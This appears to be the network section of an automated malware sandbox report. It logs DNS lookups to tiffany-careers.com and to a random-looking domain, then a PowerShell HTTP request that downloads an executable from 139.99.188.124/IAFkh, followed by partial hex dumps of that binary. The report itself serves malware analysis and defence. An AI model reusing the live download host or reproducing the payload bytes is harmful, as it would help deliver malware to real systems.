                                                                                                        Dec 23, 2024 08:39:47.379975080 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.380876064 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.381069899 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.381120920 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.381963968 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.382014036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.382132053 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.382929087 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.383059978 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.383331060 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.383996964 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.384099960 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.384160042 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.384987116 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.385102987 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.385226965 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.386039972 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.386142969 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.386197090 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.387085915 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.387151957 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.387209892 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.388252974 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.388269901 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.388314962 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.389170885 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.389256954 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.389394999 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.390290976 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.390306950 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.390351057 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.391225100 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.391520977 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.391582012 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.392281055 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.392388105 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.392535925 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.393279076 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.393403053 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.394316912 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.394325972 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.394488096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.394555092 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.395365000 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.395385981 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.395447969 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.396434069 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.396533012 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.396575928 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.397460938 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.397559881 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.397998095 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.398464918 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.398574114 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.398642063 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.399588108 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.399614096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.399784088 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.400559902 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.400703907 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.400758028 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.401568890 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.401701927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.401875973 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.402635098 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.402738094 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.402781963 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.403697014 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.403801918 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.403909922 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.404690981 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.404815912 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.404882908 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.405766010 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.405836105 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.405924082 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.406761885 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.406857967 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.407032013 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.407905102 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.408032894 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.408077002 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.408857107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.408951044 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.408994913 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.409923077 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.410003901 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.410262108 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.410938025 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.411006927 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.412013054 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.412066936 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.412075043 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.412296057 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.413045883 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.413106918 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.413175106 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.414124966 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.414208889 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.414252996 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.415163994 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.415186882 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.415237904 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.416145086 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.416162014 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.416223049 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.417247057 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.417263985 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.417567015 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.418145895 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.550447941 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.550512075 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.550515890 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.550811052 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.550913095 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.551120043 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.551879883 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.551924944 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.552050114 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.552961111 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.552974939 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.553041935 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.553916931 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.553992033 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.554012060 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.555006981 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.555051088 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.555095911 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.556015015 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.556068897 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.556099892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.557109118 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.557249069 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.557465076 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.558141947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.558156013 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.558212042 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.559084892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.559215069 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.559278011 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.566210032 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.566297054 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.566379070 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.566724062 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.566767931 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.566822052 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.567745924 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.567903042 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.567954063 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.568793058 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.568837881 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.568856001 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.569845915 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.570007086 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.570055962 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.570872068 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.570918083 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.570919991 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.571953058 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.572032928 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.572079897 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.572935104 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.572985888 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.573021889 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.573985100 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.574064016 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.574115038 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.574999094 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.575052023 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.575165987 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.576047897 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.576150894 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.576200008 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.577157021 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.577223063 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.577285051 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.578135967 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.578191996 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.578237057 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.579241037 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.579289913 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.579355955 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.580241919 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.580358982 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.580413103 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.581335068 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.581409931 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.581454039 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.582256079 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.582303047 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.582375050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.583354950 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.583369017 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.583417892 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.584551096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.584599018 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.584796906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:47.712932110 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:47.851284981 CET4980080192.168.2.6139.99.188.124
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 23, 2024 08:39:16.803947926 CET6192453192.168.2.61.1.1.1
                                                                                                        Dec 23, 2024 08:39:16.943422079 CET53619241.1.1.1192.168.2.6
                                                                                                        Dec 23, 2024 08:39:41.512689114 CET6376653192.168.2.61.1.1.1
                                                                                                        Dec 23, 2024 08:39:50.335503101 CET6125653192.168.2.61.1.1.1
                                                                                                        Dec 23, 2024 08:39:50.476089001 CET53612561.1.1.1192.168.2.6
                                                                                                        Dec 23, 2024 08:40:10.749681950 CET6320553192.168.2.61.1.1.1
                                                                                                        Dec 23, 2024 08:40:10.890923023 CET53632051.1.1.1192.168.2.6
                                                                                                        Dec 23, 2024 08:40:33.312580109 CET5160953192.168.2.61.1.1.1
                                                                                                        Dec 23, 2024 08:40:33.450445890 CET53516091.1.1.1192.168.2.6
                                                                                                        Dec 23, 2024 08:40:57.951822042 CET5244753192.168.2.61.1.1.1
                                                                                                        Dec 23, 2024 08:40:58.090277910 CET53524471.1.1.1192.168.2.6
                                                                                                        Dec 23, 2024 08:41:22.500134945 CET5008353192.168.2.61.1.1.1
                                                                                                        Dec 23, 2024 08:41:22.637501955 CET53500831.1.1.1192.168.2.6
                                                                                                        Dec 23, 2024 08:41:47.060111046 CET5484153192.168.2.61.1.1.1
                                                                                                        Dec 23, 2024 08:41:47.197592974 CET53548411.1.1.1192.168.2.6
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 23, 2024 08:39:16.803947926 CET192.168.2.61.1.1.10x7931Standard query (0)tiffany-careers.comA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:39:41.512689114 CET192.168.2.61.1.1.10x1492Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:39:50.335503101 CET192.168.2.61.1.1.10xf624Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:40:10.749681950 CET192.168.2.61.1.1.10x695fStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:40:33.312580109 CET192.168.2.61.1.1.10x89Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:40:57.951822042 CET192.168.2.61.1.1.10xb9e5Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:41:22.500134945 CET192.168.2.61.1.1.10x42e0Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:41:47.060111046 CET192.168.2.61.1.1.10xf9fdStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 23, 2024 08:39:16.943422079 CET1.1.1.1192.168.2.60x7931No error (0)tiffany-careers.com147.45.49.155A (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:39:41.728708029 CET1.1.1.1192.168.2.60x1492No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:39:50.476089001 CET1.1.1.1192.168.2.60xf624Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:40:10.890923023 CET1.1.1.1192.168.2.60x695fName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:40:33.450445890 CET1.1.1.1192.168.2.60x89Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:40:58.090277910 CET1.1.1.1192.168.2.60xb9e5Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:41:22.637501955 CET1.1.1.1192.168.2.60x42e0Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                        Dec 23, 2024 08:41:47.197592974 CET1.1.1.1192.168.2.60xf9fdName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                        • tiffany-careers.com
                                                                                                        • 139.99.188.124
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649783139.99.188.124808156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 23, 2024 08:39:38.768599987 CET164OUTGET /IAFkh HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                        Host: 139.99.188.124
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 23, 2024 08:39:40.260401011 CET1236INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 23 Dec 2024 07:39:39 GMT
                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                        Last-Modified: Mon, 16 Dec 2024 07:33:56 GMT
                                                                                                        ETag: "da2a8-6295e34064898"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 893608
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 [TRUNCATED]
                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*PEL_pZ"@@@@|Ppq; [@.text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                                                                                        Dec 23, 2024 08:39:40.260421038 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 61 4c 00
                                                                                                        Data Ascii: DaLhC\YLhCKYNhC:YhC.Y<ChCYhCYQ>hCYsLQ@sLP9hCYGhC
                                                                                                        Dec 23, 2024 08:39:40.260436058 CET1236INData Raw: 46 04 59 83 24 b8 00 47 3b 7e 08 72 e7 ff 76 04 83 66 08 00 e8 bc fb 01 00 59 5f 5e c3 56 8b f1 57 8b 4e 78 85 c9 75 59 8b 46 7c 83 f8 0b 0f 8f 2a a4 03 00 0f 84 0a a4 03 00 83 e8 05 74 4e 83 e8 03 0f 84 df a3 03 00 48 48 0f 84 bd a3 03 00 83 66
                                                                                                        Data Ascii: FY$G;~rvfY_^VWNxuYF|*tNHHfpNTF|N$NV\Y_^QfxNptQ,SV3WN~^^^N$NT^4^8^<^@^D~H~L^P^d^h^p^x
                                                                                                        Dec 23, 2024 08:39:40.260497093 CET1236INData Raw: 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2 08 40 89 45 f4 05 f0 f7 ff ff 03 c1 89 55 0c 3b 46 0c 8b 45 f4 7c e2 8b 46 0c 3b d8 74 1a 2b c3 50 8d 86 10 08 00 00 03 c3 50 8d 43 02 8d 04 c6 50 57 ff 15 24 01 49 00 8b 76 04 85 f6 75 8d ff
                                                                                                        Data Ascii: EUM8sS@EU;FE|F;t+PPCPW$IvuuW_^[];t +QPCPW$IEUMtDuLMtuWzME8tM@tEujPQWEUM#E
                                                                                                        Dec 23, 2024 08:39:40.260548115 CET1236INData Raw: 00 83 7e 4c ff 8b f8 74 03 8b 7e 4c 57 53 ff 15 40 01 49 00 6a 00 57 e8 55 08 00 00 eb 8f 8b c8 83 e9 4e 0f 84 aa 9e 03 00 83 e9 05 0f 84 90 9e 03 00 83 e9 28 0f 84 71 9e 03 00 83 e9 09 0f 84 52 9e 03 00 81 e9 8d 00 00 00 0f 84 30 9e 03 00 49 0f
                                                                                                        Data Ascii: ~Lt~LWS@IjWUN(qR0IIIDjUuuR+t#I4Iu-V&SVPWPVItIIhQQVCj~jwQHjUVW
                                                                                                        Dec 23, 2024 08:39:40.260561943 CET1120INData Raw: 0f 85 55 9c 03 00 5f 5e 5b 8b e5 5d c2 0c 00 8b 7d 0c 66 8b 46 58 80 bf 90 00 00 00 07 66 89 87 88 00 00 00 66 8b 46 5c 66 89 87 8a 00 00 00 74 5f 66 8b 46 60 66 89 87 8c 00 00 00 66 8b 46 64 66 89 87 8e 00 00 00 8d 45 dc 50 ff 37 ff 15 34 06 49
